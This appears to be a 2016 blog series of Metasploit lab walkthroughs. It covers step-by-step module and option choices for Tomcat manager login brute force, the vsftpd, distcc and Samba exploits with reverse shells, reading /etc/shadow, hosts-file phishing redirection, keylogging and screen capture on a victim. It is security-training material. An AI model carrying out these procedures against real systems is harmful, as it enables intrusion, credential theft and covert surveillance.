Saturday, June 11, 2016

METASPLOIT - Linux - Tomcat


- Layout for this exercise:

-  Tomcat is an open-source web server developed by the Apache Software Foundation (ASF). Tomcat implements several Java EE specifications including Java Servlet, JavaServer Pages (JSP), Java EL, and WebSocket, and provides a "pure Java" HTTP web server environment in which Java code can run.

- Metasploit Framework provides a module that attempts to login to a Tomcat Application Manager instance using a specific user/pass.

- Required options for this exploit are remote host (victim's IP) and port (8180):

- The exploit achieves a successful login with valid username and password, using a wordlist provided by Metasploit:



- Now, a new module can be used to execute a payload on Tomcat servers that have an exposed "manager" application.
Required options are, aside from RHOST and RPORT, the username and password discovered in the previous step (tomcat/tomcat):

- Also, this payload will generate a remote reverse meterpreter :

- Required options are local attacker's IP and listening port:

- Launching the exploit, a meterpreter session is generated as expected:

- Also, using discovered credentials the attacker has got easy access to the Tomcat Administration  Tool web page:

Friday, June 10, 2016



- Layout for this exercise:

- vsftpd is a GPL licensed FTP server for UNIX systems, including Linux. A malicious backdoor was added to the VSFTPD download into the vsftpd-2.3.4.tar.gz archive. This backdoor was later removed, but Metasploit provides a module to exploit it.

- Payload is set to cmd/unix/interact:

- Required option is just the remote host's IP:

- Setting RHOST to the victim's IP:

- Launching the exploit a remote shell is achieved:

METASPLOIT - Linux - Distcc


- Layout for this exercise:

- distcc is a program to distribute compilation or builds of C, C++, Objective C or Objective C++ code across several machines on a network. Metasploit provides an exploit to take control of a system running distcc:

- The payload cmd/unix/reverse triggers a reverse shell connection:

- Required options are remote and local hosts:

- Setting RHOST (victim) and LHOST (attacker):

- Launching the exploit, the result is a remote shell on the victim:

METASPLOIT - Linux - Samba


- Layout for this exercise:

- The attacker scans possible open ports and servicies at the victim's machine using NMAP:

- On port 139 the victim is running Samba, service used for File Sharing that in this case suffers from a vulnerability. Metasploit provides the usermap_script exploit to take advantage of that vulnerability:

- Let's set the payload to cmd/unix/reverse:

- Required options include remote host (victim) and local host (attacker):

- Setting remote host's IP:

- Setting attacker's IP:

- Launching the exploit, the result is a remote shell that allow postexplotaition of the victim:

- For instance, from the remote shell both /etc/passwd and /etc/shadow content can be discovered:

METASPLOIT - Windows 7 - Bypassing DNS by HOSTS file injection


- Layout for this exercise:

The hosts file is a plain text file used by an operating systems to map hostnames and IP addresses.

- In this practice we'll se how to inject a crafted hosts file into the victim machine, so that
the well known URL is redirected to the attacker's website.

- This is a case of the so called phishing, where a trustworthy website is masqueraded by a fake website.

- One of the keys for this attack to be successful is the name resolution order performed by Windows systems. First, the Windows 7 looks up into the hosts file entries. Second, Domain Name System (DNS) servers are queried.

- For this reason, if a crafted hosts file is injected into the victim's machine, the victim would not be able to notice that the web destination is actually a fake one.

- Let's start the attack backgrounding the active meterpreter session:

- Now, the post explotaition inject_host exploit is used:

- Options for this exploit:

The domain to be faked:

The attacker's IP:

- The active meterpreter session:

- Now, all required options are fulfilled:

- The exploit is launched and successfully completed:

- As a result, back into the victim, the hosts file has got now a new entry, pointing to the attacker's IP: 

- On the attacker's side, with the purpose of taking advantage of the attack, a web server is set up on port 80, adding a message of welcome:

- From the victim's machine, when trying to connect to, the connection is redirected to the attacker's website:

- Let's notice that this redirection or phising could be done on the victim's site with any trustworthy type of websites, like banks, email services, businesss, ... , and on the attacker's side with a fake website where the victim could introduce valid credentials, potentially being stolen by the attacker.

- It is interesting to check the different way that commands ping and nslookup handle this situation.

- When ping-ing, the resolution is between and

- On the other hand nslookup is a network administration command-line tool available for querying the Domain Name System (DNS) to obtain domain name or IP address mapping.

- In this way, nslookup only checks for DNS resolution, not paying attention to the hosts file, and resolves into the real IP

As said before, hosts file is used before DNS resolution by Windows systems.

METASPLOIT - Windows 7 - Keylogger


- Layout for this exercise:

- Keyscan_start command starts the process of capturing keystrokes at the victim's machine:

- Now, let's suppose that a user at the victim's machine writes a set of characters, like for instance:

The attacker can achieve all those characters just using the command keyscan_dump:

- Once the attack succesfully performed, the keyscan process can be stopped:

METASPLOIT - Windows 7 - Desktop screen grabbing


- Layout for this exercise:

- Windows systems automatically create an interactive window station. When an interactive user logs on, the system associates the interactive window station with the user logon session. The system also creates the default input desktop for the interactive window station (WinSta0\Default). Processes started by the logged-on user are associated with the WinSta0\Default desktop. In other words, WinSta0 stations is used to interact with users:

- The command enumdesktops enumerates all accessible desktops:

- Checking that the active desktop is interactive:

- Loading espia extension from meterpreter:

Then, screengrab command allows to grab a screenshot from active desktop at the victim's machine. The picture is saved under the path /root, receiving a .jpeg extension: